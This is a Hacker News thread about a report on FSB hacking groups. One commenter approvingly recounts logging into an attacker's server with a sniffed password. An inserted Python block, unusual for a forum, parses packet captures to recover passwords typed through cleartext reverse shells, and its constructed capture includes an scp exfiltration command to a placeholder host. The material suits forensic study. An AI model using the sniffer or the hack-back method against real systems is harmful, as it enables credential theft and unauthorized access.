The Elite Hackers of the FSB (br.de)
59 points by truxs on Feb 20, 2022 | 19 comments


There's simply no forensic evidence of their claims here -- just a CPU-draining powerpoint show of nothingburgers. This reminds me of a slightly more modern version of Condoleezza Rice presenting fake evidence of Saddam Hussein's WMD development. Just a basic appeal to authority with a total lack of evidence.


Though that's always the problem with non-open-source secret-intelligence information. We either trust the government/system/organization, or we do not.


Trust their incentives.


I have an interesting story that I can only recently share due to the statute of limitations passing. I'll stay anonymous for this story.

A number of years ago, I worked on a security team "somewhere". When I joined the place, I was given some context by the other employees about advanced intrusions in the past. For years I spent late nights poring over my laptop trying to find every imaginable way of breaching the network, and searching for indicators of compromise. Until it happened!

When it happened, it happened so quickly I was blindsided. The attack took place during a time when we would least expect it (not holidays or a certain hour, something else). I was the first to notice the indicators of compromise. They were so quick to work through our network, they identified paths that took me years of research to locate in mere weeks. We were able to stop them, thanks to our network monitoring. Many of the techniques they used were cutting-edge research, released within the past month. Very impressive and informative. However... they made a mistake.

In one of their reverse shells, they were using scp to copy our files to their backup servers. See the mistake? By dumping the packet data from the reverse shell connection, a plaintext password to their server was available. And this is where the statute of limitations comes in.

I connected back to their server with Tor. "Hacking back" is illegal, but I (personally) had to know who bested my efforts to secure the network -- and what they had. What I found was fascinating. They rented out a Linux VPS on a well known provider, but they rebooted the system into a live OS to run in memory. For persistent storage, they connected an SSHFS mountpoint. I thought about it and realized how clever it was to run the OS in memory. If the server is shut down for forensics, nothing would be found.

I explored their files. They were curiously organized. Every one of their targets was stored in a separate folder under a single parent data-exfiltration folder. They also had an exploits folder, which had only public exploits. I thought about it and this also made sense, you can avoid profiling by using public exploits. They changed the shellcode in the exploits, however. Their targets surprised me (almost as much as the access they achieved in them). Hetzner, Huawei, and many others. One target was a national security/defense entity of another country, and they set up an SSL/TLS MITM on their ENTIRE network and extracted all of their repositories and credentials. Unbelievable skill. I wouldn't believe it if it was in a movie.

They used their own proxy network, and to the best of my knowledge they only made one mistake. Because of that mistake, I believe I know who was responsible. I feel like I've already said too much though, this is the first time I've made a comment about my experiences in security. On the fence about sharing but I thought you all might enjoy the story!


Cool story, that does indeed sound like a plot out of a movie!

How were you able to extract a password from just listening to scp (ssh really) traffic though? Also, how did you know that someone's entire network was SSL MITM'd, only by looking at the data they dumped? Did the hackers store a readme file along with every dump?


The traffic containing the clear text password was not scp, it was the reverse shell they sent themselves. Reverse shells are unencrypted on the wire, and when scp prompted for the password, they typed it in over their reverse shell. A significant oversight on their part. If it was a team, it must have been a less experienced member who made that mistake.

As far as the SSL MITM goes, they indeed documented their attack with various files containing notes in English. They had a separate directory (within the target's folder) containing the certificates they were using in the attack.
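The mistake described in the story and spelled out in the reply above (scp's password prompt and the typed reply both travelling through a cleartext reverse shell) can be checked mechanically against a capture. The following is an added example, not code from the commenter or from the article: a stdlib-only pcap walker that reassembles each direction of a TCP flow, watches for a password prompt, and records what the other side types back. All addresses, ports, the scp command and the password are constructed for the demo (10.0.0.5 as the victim, 198.51.100.7 as the operator's listener, 203.0.113.9 as the backup host).

```python
"""Recover a password typed through a plaintext reverse shell from a pcap.

Stdlib only. Frames are assumed to be Ethernet/IPv4/TCP (no VLAN tags, no
pcapng); the capture is constructed below to mirror the thread's scenario.
"""
import re
import struct

PCAP_MAGIC = 0xA1B2C3D4
ETH_IPV4, IP_PROTO_TCP = 0x0800, 6
PROMPT = re.compile(rb"(?i)password:\s*$")  # ssh/scp prompt; the reply is the secret


def _ip(addr):
    return bytes(int(o) for o in addr.split("."))


def build_frame(src, sport, dst, dport, payload):
    """Ethernet+IPv4+TCP frame. Checksums stay zero; the parser never checks them."""
    eth = bytes(12) + struct.pack("!H", ETH_IPV4)
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0, 0, 64, IP_PROTO_TCP, 0, _ip(src), _ip(dst))
    return eth + ip + tcp + payload


def build_pcap(frames):
    """Minimal libpcap file: 24-byte global header (linktype 1 = Ethernet) + records."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1_600_000_000 + i, 0, len(f), len(f)) + f
    return out


def tcp_segments(pcap):
    """Yield (src, sport, dst, dport, payload) for each TCP segment that carries data."""
    endian = "<" if struct.unpack("<I", pcap[:4])[0] == PCAP_MAGIC else ">"
    off = 24
    while off + 16 <= len(pcap):
        caplen = struct.unpack(endian + "IIII", pcap[off:off + 16])[2]
        frame = pcap[off + 16:off + 16 + caplen]
        off += 16 + caplen
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETH_IPV4:
            continue
        ip = frame[14:]
        if ip[9] != IP_PROTO_TCP:
            continue
        tcp = ip[(ip[0] & 0x0F) * 4:struct.unpack("!H", ip[2:4])[0]]
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield (".".join(map(str, ip[12:16])), sport,
                   ".".join(map(str, ip[16:20])), dport, payload)


def find_typed_secrets(pcap):
    """Walk segments in capture order. When one direction of a flow ends in a password
    prompt, collect what the opposite direction sends next, up to the newline. Keystrokes
    may arrive one per segment (raw-mode terminal), so the reply is accumulated."""
    partial, last_line, results, pending = {}, {}, [], None
    for src, sport, dst, dport, data in tcp_segments(pcap):
        flow, reverse = (src, sport, dst, dport), (dst, dport, src, sport)
        *done, rest = (partial.get(flow, b"") + data).split(b"\n")
        partial[flow] = rest
        if done:
            last_line[flow] = done[-1].rstrip(b"\r")
        if pending and flow == pending["reply_flow"]:
            if done:  # newline arrived: the first completed line is the secret
                results.append({"prompt": pending["prompt"],
                                "command": pending["command"],
                                "typed": done[0].rstrip(b"\r").decode("utf-8", "replace"),
                                "typed_by": src})
                pending = None
        elif PROMPT.search(rest):
            pending = {"prompt": rest.decode("utf-8", "replace").strip(),
                       "command": last_line.get(reverse, b"").decode("utf-8", "replace"),
                       "reply_flow": reverse}
    return results


VICTIM, OPERATOR, BACKUP = "10.0.0.5", "198.51.100.7", "203.0.113.9"  # hypothetical hosts


def sample_capture():
    """Constructed traffic: victim:51234 holds a cleartext shell to operator:4444; the
    operator runs scp inside it and types the backup server's password."""
    def v2o(p): return build_frame(VICTIM, 51234, OPERATOR, 4444, p)
    def o2v(p): return build_frame(OPERATOR, 4444, VICTIM, 51234, p)
    return build_pcap([
        o2v(b"scp /srv/export.tgz op@" + BACKUP.encode() + b":/loot/\n"),
        v2o(b"op@" + BACKUP.encode() + b"'s password: "),
        o2v(b"hun"),  # password arrives a few keystrokes per segment
        o2v(b"ter2\r\n"),
        v2o(b"export.tgz   100% 4096KB   1.2MB/s   00:03\n"),
    ])


if __name__ == "__main__":
    for hit in find_typed_secrets(sample_capture()):
        print(hit)
```

Against a real capture, replace `sample_capture()` with `open(path, "rb").read()`; the result also names the scp target host the operator was exfiltrating to, which is the lead the story's author followed up on. The same walk returns nothing if the shell is wrapped in TLS or tunnelled, which is exactly the point the reply about encrypted Metasploit payloads makes: the only thing that made this recoverable was the cleartext transport.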


Can't help but imagine your www-data which spawned nc, and it seems too amateurish for a high-profile hacker group. It makes it seem as if they copy-pasted the first one-liner reverse shell found on Google. Even the Metasploit framework introduced payloads a while ago that do traffic encryption/obfuscation. Much more subtle reverse shells are used in the wild, where a compromised machine reaches out to the hacker's server once in a while and receives commands and dumps output, even over something like ICMP/Loki or Covert TCP.


Hey, as one of the reporters writing the article, I'm intrigued, obviously :D


Leaving an email on your profile (the “about” field) might increase the chances of someone contacting you.


The WebGL graphics background on this site causes my Laptop to chug pretty severely, to the point where I'm not able to read the content.


The website UI/UX is truly amazing, and as a web dev, I wish I knew how to write websites like this.


I'm thankful for Firefox reader view. Had that not worked, it would have been a quick Ctrl-A, Ctrl-C, Ctrl-V into my fav editor. Good article. I'm not sure why someone would intentionally make it more difficult to read. The world is swimming in content, but I'm not so certain attention spans have increased. Risky business.

That said, I don't disagree that the special effects seem impressive -- not that I'm competent to judge.




What about this is state propaganda? Turla/Snake is very real, the fact that they attacked several agencies like the German foreign ministry and others is very real, as well as that all of the connections shown in this article do exist and can be verified by doing some googling.


The article contains no proof except for references to documents published by the same government that is producing the article itself. It's propaganda.


Just a quick reminder for anyone outside of dictatorships: there is independent media/press in Germany; the article was not produced by any government entity.


> there is independent media/press in Germany, the article was not produced by any government entity.

Perhaps, but the public broadcasting channels (Öffentlich-rechtlicher Rundfunk) aren't part of this. You can predict their reporting and spin with good accuracy depending on which political party they're aligned with (SPD -> ARD, CDU -> ZDF, NDR -> Die Grünen).


> there is independent media/press in Germany

Barely. Besides the obvious state-controlled public broadcasting, many publishing houses are owned by mainstream parties and their foundations. The biggest socialist party, the SPD, for example owns more than 40 newspapers. They are de facto state media. Also, the state spends about a quarter billion Euros (!) subsidising publishers that otherwise would go bankrupt. You can't expect the recipients of that money to be neutral.

> the article was not produced by any government entity

It is clearly published by a government entity. Public broadcasting is not a neutral party.


This tedious argument is repurposed for every thread that ever mentions CNE attribution. There should be a button in the HN UI to generate it.


The best propaganda is true. Not all propaganda is lies.



